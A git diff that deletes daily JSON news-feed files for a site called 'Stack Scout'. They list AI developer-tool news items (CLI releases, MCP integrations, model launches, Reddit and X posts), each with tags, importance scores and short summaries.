"developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-04-30T05:23:49.823Z", - "summary": "Cursor's SDK reduces agent deployment to three lines of TypeScript, democratizing agent development. The release is the AWS moment for agents, dramatically lowering the barrier to production deployment.", - "category": "ai_tools" - }, - { - "title": "Codex CLI 0.128.0 is out! 
Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", - "url": "https://x.com/Codex_Changelog/status/2049905403262079480", - "source": "X / @codex_changelog", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.97, - "date": "2026-04-30T17:35:08.000Z", - "summary": "Codex CLI 0.128.0 is out! Persisted /goal workflows: create, pause, resume, clear codex update + configurable TUI keymaps Built-in permission profiles + sandbox CLI selection Changelog:", - "category": "ai_tools" - }, - { - "title": "Show HN: Pu.sh – a full coding-agent harness in 400 lines of shell", - "url": "https://pu.dev/", - "source": "Hacker News", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 0.88, - "date": "2026-04-30T20:55:12.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "26 years ago I took a website management company public on NASDAQ (200+ staff, 60 engineers). Over just a few weekends I rebuilt a better product using Claude Code.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t00h8u/26_years_ago_i_took_a_website_management_company/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 0.8600000000000001, - "date": "2026-04-30T15:59:02.000Z", - "summary": "Yeah, me again, same guy from [the Legends of Future Past post](https://www.reddit.com/r/ClaudeAI/comments/1sfsz67/i_gave_claude_my_dead_games_30yearold_files_and/) a few weeks back (where I resurrected a 30+ year old game I lost the source to from its script files, using Claude Code). A bunch of folks asked what else I was working on. This is it.\n\nLightCMS is now open source: [https://github.com/jonradoff/lightcms](https://github.com/jonradoff/lightcms) (MIT). 
About 47K lines of Go, 114 MCP too", - "category": "ai_tools" - }, - { - "title": "pnpm v11.0.3 released", - "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.3", - "source": "GitHub Releases · pnpm", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.84, - "date": "2026-04-30T21:17:05.000Z", - "summary": "## Patch Changes\r\n\r\n* Fix too many open files error sometimes happening on Windows, when creating command shims in `node_modules/.bin` [#11412](https://github.com/pnpm/pnpm/issues/11412).\r\n* Fix `ERR_PNPM_FETCH_404` when installing a project whose lockfile depends on a `file:` tarball. The previous behavior dropped the `tarball` field from `file:` and git-hosted resolutions when `lockfile-include-tarball-url=false` (the default), even though those URLs cannot be reconstructed from the package na", - "category": "ai_tools" - }, - { - "title": "Vercel CLI @vercel/python-workers@0.0.20 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.20", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.76, - "date": "2026-04-30T03:51:45.000Z", - "summary": "### Patch Changes\n\n- 894e7d4: [python/vercel-workers] refactor framework-specific logic into vercel-workers\n", - "category": "ai_tools" - }, - { - "title": "Gemini CLI v0.40.1 released", - "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.40.1", - "source": "GitHub Releases · Gemini CLI", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-04-30T18:16:48.000Z", - "summary": "## What's Changed\n* fix(patch): cherry-pick 2194da2 to release/v0.40.0-pr-26153 to patch version v0.40.0 and create version 0.40.1 by @gemini-cli-robot in 
https://github.com/google-gemini/gemini-cli/pull/26268\n\n\n**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.40.0...v0.40.1", - "category": "ai_tools" - }, - { - "title": "X announces a rebuilt ad platform powered by AI", - "url": "https://techcrunch.com/2026/04/30/x-announces-a-rebuilt-ad-platform-powered-by-ai/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-30T18:04:35.970Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Stripe introduces Link, a digital wallet that autonomous AI agents can use, too", - "url": "https://techcrunch.com/2026/04/30/stripe-link-digital-wallet-ai-agents-shopping/", - "source": "TechCrunch AI", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-04-30T18:04:35.962Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "The MCP Era Feels Like Déjà Vu 1 day ago • 3", - "url": "https://huggingface.co/blog/Navid-AI/mcp-era-feels-like-deja-vu", - "source": "Hugging Face Blog", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-30T18:04:33.505Z", - "summary": null, - "category": "ai_models" - }, - { - "title": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tut…", - "url": "https://x.com/ClaudeDigest/status/2049902211292127462", - "source": "X / @claudedigest", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-04-30T17:22:27.000Z", - "summary": "Most people use Claude Code like autocomplete. This tutorial shows how to use it like a system: agentic loops, subagents, MCP servers, real workflows. 
That’s the difference between “AI help” and real leverage. https:// claudedigest.com/tutorials/mdx/ mastering-claude-code …", - "category": "ai_tools" - }, - { - "title": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", - "url": "https://x.com/polsia/status/2049901864381288455", - "source": "X / @polsia", - "tags": [ - "agent_tool" - ], - "matching_tags": [ - "agent_tool" - ], - "importance": 1, - "date": "2026-04-30T17:21:04.000Z", - "summary": "81% of dev teams use AI in testing, but the QE Lead is still human. Greenlyt changes that. Autonomous AI agent that owns your entire release quality process.", - "category": "ai_tools" - }, - { - "title": "MiMo-V2.5-Pro Matches Opus 4.6 at 8x Lower Cost — Open Weights", - "url": "https://x.com/itsPaulAi/status/2049862276832715177", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-04-30T15:20:23.436Z", - "summary": "Braygent's take: MiMo-V2.5-Pro at 8x lower cost than Opus 4.6 is the open vs closed model story of 2026. 
The gap is closing fast.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-01.json b/data/news-feed-2026-05-01.json deleted file mode 100644 index 989f34e..0000000 --- a/data/news-feed-2026-05-01.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.161Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-01", - "article_count": 15, - "archived_story_count": 600, - "articles": [ - { - "title": "Built + open sourced anti-slopsquatting CLI", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0ltr5/built_open_sourced_antislopsquatting_cli/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-01T06:56:08.000Z", - "summary": "TL;DR: built an open source CLI that scans your repository's manifest (package.json, requirements.txt, go.mod) files for indicators of slopsquatting or other supply chain attack indicators.\n\nRepo: https://github.com/zhendahu/dep-doctor\n\nThere's been a ton of supply chain attacks recently ([Axios](https://github.com/axios/axios/issues/10636), [LiteLLM](https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html), [Trivy](https://www.paloaltonetworks.com/blog/cloud-s", - "category": "ai_tools" - }, - { - "title": "Vercel CLI @vercel/python-workers@0.0.21 released", - "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.21", - "source": "GitHub Releases · Vercel CLI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.62, - "date": "2026-05-01T22:29:33.000Z", - "summary": "### Patch Changes\n\n- 6935baa: Refactor Python queue sdk into `_queue/`\n- 574c9f1: [vercel-workers] Replaces 
retention_seconds and delay_seconds with retention and delay which support timedelta, e.g retention=timedelta(hours=6)\n", - "category": "ai_tools" - }, - { - "title": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterpri…", - "url": "https://x.com/firstadopter/status/2050264818972516799", - "source": "X / @firstadopter", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T17:23:19.000Z", - "summary": "Bonkers. Also, told y’all! OpenAI: “One week since the launch of GPT-5.5, and it’s already our strongest model launch yet” API revenue: “growing more than 2x faster than any prior release” “Codex doubled revenue in under 7 days as enterprise demand for agentic coding tools..”", - "category": "ai_tools" - }, - { - "title": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic codi…", - "url": "https://x.com/OpenAI/status/2050250926888468929", - "source": "X / @openai", - "tags": [ - "api_update", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T16:28:07.000Z", - "summary": "One week since the launch of GPT-5.5, and it’s already our strongest model launch yet. API revenue is growing more than 2x faster than any prior release, while Codex doubled revenue in under seven days as enterprise demand for agentic coding tools keeps climbing.", - "category": "ai_tools" - }, - { - "title": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). 
What makes this annou This is the kind of move that separates the builders from the watchers.", - "url": "https://x.com/yunara97/status/2050108352550592636", - "source": "X / @yunara97", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-01T07:01:35.000Z", - "summary": "Meta released their Ads MCP and CLI today – if you use Claude or ChatGPT you should install this asap (resources in comments). What makes this annou This is the kind of move that separates the builders from the watchers.", - "category": "ai_tools" - }, - { - "title": "Hermes Agent Is Now in LM Studio — The Open-Source Agent Ecosystem Is Growing Fast", - "url": "https://x.com/NousResearch/status/2049878944007041210", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "tool_update" - ], - "matching_tags": [ - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-01T02:15:34.945Z", - "summary": "Hermes Agent's integration with LM Studio brings it to one of the most popular local model runners. 
The open-source agent ecosystem is maturing quickly.", - "category": "ai_tools" - }, - { - "title": "Whohas – Command-line utility for cross-distro, cross-repository package search", - "url": "https://github.com/whohas/whohas", - "source": "Hacker News", - "tags": [ - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "developer_tool", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-05-01T15:01:08.000Z", - "summary": null, - "category": "tech_general" - }, - { - "title": "Cloud Skills Are Still Just Skills - How Anthropic no longer releases new skills, and gates them within the Cloud now with Ultraplan, Ultrareview, and Cloud Security.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0wlme/cloud_skills_are_still_just_skills_how_anthropic/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-01T15:26:45.000Z", - "summary": "https://vexjoy.com/posts/cloud-skills-are-still-just-skills/\n\nThe skill ecosystem’s strength is composability. I can take a review skill, pair it with a Go agent, wrap it in a pipeline that saves artifacts at phase boundaries. I can inspect every piece. When something fails, I can diagnose it because I can read the prompts. 
You can’t compose what you can’t read, and you can’t diagnose failures in a stage you can’t inspect.\n\nIf Anthropic ships more features this way, the ecosystem splits into ope", - "category": "ai_tools" - }, - { - "title": "Found Zero day Claude Desktop + Chromium bug need to know where to submit report.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0u20d/found_zero_day_claude_desktop_chromium_bug_need/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "developer_tool" - ], - "importance": 0.7, - "date": "2026-05-01T13:52:27.000Z", - "summary": "Looking for official link / process to submit a vulnerability report for a high-risk official Claude Desktop + Chrome extension + native host + Cowork/MCP configuration that can become RAT-equivalent if a session, prompt chain, same-user process, or enabled extension is abused. \n\nPlease let me know where I can submit this report.", - "category": "ai_tools" - }, - { - "title": "Example of using the GodotIQ MCP with Coding Agent to create video games", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0q8bf/example_of_using_the_godotiq_mcp_with_coding/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 0.7, - "date": "2026-05-01T11:04:05.000Z", - "summary": "I’ve developed an MCP server for Godot. Most coding agents in Godot today work blindly: they read files but don’t know where the nodes are in space, don’t understand the signals, and don’t see what calls what. Godotiq solves this, giving the agent a true understanding of the 2D/3D scene, the code, and the editor.\n\nTo test it, I gave it some free assets I found online and a prompt, and let it run for about an hour. 
It produced a mini twin-stick survivors-style game with waves, bosses, power-up ca", - "category": "ai_tools" - }, - { - "title": "Mobile App with Clade", - "url": "https://reddit.com/r/ClaudeAI/comments/1t0obje/mobile_app_with_clade/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "developer_tool", - "tool_update" - ], - "matching_tags": [ - "developer_tool", - "tool_update" - ], - "importance": 0.7, - "date": "2026-05-01T09:19:51.000Z", - "summary": "Just a quick question. Is building a mobile app like this actually a legit approach? I recently came across someone building fairly complex web apps, for example a geo quiz with full database integration, using this workflow: He generates all the HTML, CSS and JS through Claude (the AI), deploys it to Netlify, connects a database like Supabase or Firebase, and then uses \"Add to Homescreen\" so it looks and feels like a native mobile app. No framework, no GitHub repo, no CI/CD, no app store. And h", - "category": "ai_tools" - }, - { - "title": "Turbo v2.9.7 released", - "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.7", - "source": "GitHub Releases · Turbo", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 0.7, - "date": "2026-05-01T02:50:31.000Z", - "summary": "\n\n## What's Changed\n### eslint\n* chore: Upgrade dependencies to resolve their known vulnerabilities by @anthonyshew in https://github.com/vercel/turborepo/pull/12604\n### Examples\n* feat(sandbox): Bump @vercel/sandbox from v1 to beta by @marc-vercel in https://github.com/vercel/turborepo/pull/12595\n* chore: Update examples to Turbo 2.9.6 by @cursor[bot] in https://github.com/vercel/turborepo/pull/12600\n* examples", - "category": "ai_tools" - }, - { - "title": "Got tired of flying blind on Claude.ai usage, built a browser extension that surfaces token counts, cache timers, and rate limits", - "url": 
"https://reddit.com/r/ClaudeAI/comments/1t0ti7h/got_tired_of_flying_blind_on_claudeai_usage_built/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.62, - "date": "2026-05-01T13:30:04.000Z", - "summary": "I kept hitting the 5-hour limit out of nowhere and had no idea how close I was to the context window filling up mid-conversation. The fact that [Claude.ai](http://Claude.ai) shows you basically nothing about your actual usage drove me nuts, especially when I'd be deep in a long chat and suddenly get cut off.\n\n\n\nSo I built a Chrome extension that adds a small dashboard to [claude.ai](http://claude.ai) showing real-time token counts per message, total context used, the prompt cache window timer (s", - "category": "ai_tools" - }, - { - "title": "You can now connect your Meta ads to Claude via MCP. Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate th…", - "url": "https://x.com/_stephenbishop_/status/2050263244020015404", - "source": "X / @_stephenbishop_", - "tags": [ - "mcp" - ], - "matching_tags": [ - "mcp" - ], - "importance": 1, - "date": "2026-05-01T17:17:04.000Z", - "summary": "You can now connect your Meta ads to Claude via MCP. 
Really good workflow I've been testing (with Higgsfield): > Analyse ad account top performers > Use Claude to come up with variations > Generate them in Higgsfield (statics) > Animate them > Re-launch on Meta", - "category": "ai_tools" - }, - { - "title": "VEED Launches AI Video Creation Tools — Helping Creators Produce at Scale", - "url": "https://x.com/veedstudio", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-01T14:45:55.101Z", - "summary": "VEED continues developing AI video creation tools enabling content creators to produce polished video content at scale without professional editing expertise. The platform targets the growing market for AI-assisted video content creation for social and marketing applications.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-02.json b/data/news-feed-2026-05-02.json deleted file mode 100644 index acfd8ba..0000000 --- a/data/news-feed-2026-05-02.json +++ /dev/null @@ -1,273 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.317Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-02", - "article_count": 15, - "archived_story_count": 459, - "articles": [ - { - "title": "@WesRoth: Meta Launches Ads MCP — Claude and ChatGPT Can Now Manage Meta Ad Accounts", - "url": "https://x.com/WesRoth/status/2050606311440531809", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "product_launch", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "mcp", - "product_launch", - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T16:23:29.285Z", - "summary": "Meta launched its Ads MCP and CLI, creating a direct bridge for frontier AI models like Claude and ChatGPT to access and interact with the Meta Ads ecosystem through natural language.", - "category": "ai_tools" - }, - { - "title": "I built a Claude Code skill that 
gives Claude real local time + session tracking (open source, one-line install)", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1xoca/i_built_a_claude_code_skill_that_gives_claude/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-02T18:27:13.000Z", - "summary": "Built this with Claude Code over a few sessions open sourcing it. Claude has no built-in clock. Each session starts cold, training data is frozen in time, and when Claude says \"the current time\" it's hallucinating. Got tired of correcting it, so I built time-anchor. **What it does:** \\- Auto-detects your timezone on install, no API key, no network call \\- Reads the host system clock when you ask for the time (the trick: Python scripts in the skill can read the OS clock when Claude executes them via bash, Claude itself stays clockless, but it now has a tool it can query) \\- Logs every session start/end so Claude can answer \"how long have we been talking\" or \"what did I say 20 minutes ago\" \\- Persists in a local JSON file (or shares with another memory plugin via $TIME\\_ANCHOR\\_MEMORY\\_PATH) \\- \\~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \\- covering \\~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. 
#### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel…", - "category": "ai_tools" - }, - { - "title": "Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)", - "url": "https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-02T15:07:24.000Z", - "summary": "Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent.\n\nParallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly.\n\nApache 2.0, local-first, zero network calls.\n\ngithub.com/Thatayotlhe04/Par", - "category": "creative_tools" - }, - { - "title": "Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. But now I can't disconnect from the local server.", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-02T17:07:21.000Z", - "summary": "I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. 
So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time?", - "category": "ai_tools" - }, - { - "title": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…", - "url": "https://x.com/HudBeer/status/2050622456436818111", - "source": "X / @hudbeer", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-02T17:04:26.000Z", - "summary": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. 
Architecture wins.", - "category": "ai_tools" - }, - { - "title": "Weekly Meal Planning Fully Automated with Claude and Migros MCP", - "url": "https://x.com/hslu_aiml/status/2049100936287498456", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T16:28:06.379Z", - "summary": "A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end.", - "category": "ai_tools" - }, - { - "title": "@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement", - "url": "https://x.com/ValsAI/status/2050240263420072446", - "source": "Aligned News (Scoble)", - "tags": [ - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "cli_tool", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T16:21:16.690Z", - "summary": "Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index.", - "category": "ai_tools" - }, - { - "title": "I built \"Semvec\": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "agent_tool" - ], - "matching_tags": [ - "mcp", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-02T15:49:05.000Z", - "summary": "Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. 
It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \\- Constant-size compressed context: Token-reduced LLM context that stops growing. \\- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \\- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \\- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs…", - "category": "ai_tools" - }, - { - "title": "The OpenAI Prompting Guide Has Been Updated. 🙌🏻 Check It Out 👏🏻", - "url": "https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-02T15:47:33.000Z", - "summary": "A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻", - "category": "ai_tools" - }, - { - "title": "I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. 
[Experiment - Educational Purpose]", - "url": "https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-02T13:05:38.000Z", - "summary": "Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo)", - "category": "ai_tools" - }, - { - "title": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…", - "url": "https://x.com/genondemand3d/status/2050539325763293222", - "source": "X / @genondemand3d", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-02T11:34:07.000Z", - "summary": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow", - "category": "ai_tools" - }, - { - "title": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. 
The release emphasizes real-tim…", - "url": "https://x.com/mehedi_u/status/2050462001571504588", - "source": "X / @mehedi_u", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-02T06:26:51.000Z", - "summary": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building", - "category": "ai_tools" - }, - { - "title": "Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It", - "url": "https://x.com/aakashgupta/status/2050349093969694825", - "source": "Aligned News (Scoble)", - "tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T23:49:55.116Z", - "summary": "Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition.", - "category": "ai_tools" - }, - { - "title": "Pika Just Let You Give Claude a Face and Make Videos Through Conversation", - "url": "https://x.com/pika_labs/status/2050294291998933455", - "source": "Aligned News (Scoble)", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-01T23:49:55.116Z", - "summary": "Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access.", - "category": "ai_tools" - }, - { - "title": "NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize", - "url": "https://x.com/NVIDIAAI/status/2050336285428998202", - "source": "Aligned News (Scoble)", - 
"tags": [ - "open_source", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-01T23:49:55.116Z", - "summary": "Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-03.json b/data/news-feed-2026-05-03.json deleted file mode 100644 index d4165b8..0000000 --- a/data/news-feed-2026-05-03.json +++ /dev/null @@ -1,247 +0,0 @@ -{ - "generated": "2026-06-05T00:44:37.493Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-03", - "article_count": 15, - "archived_story_count": 379, - "articles": [ - { - "title": "EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.", - "url": "https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-03T18:40:22.000Z", - "summary": "• Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 
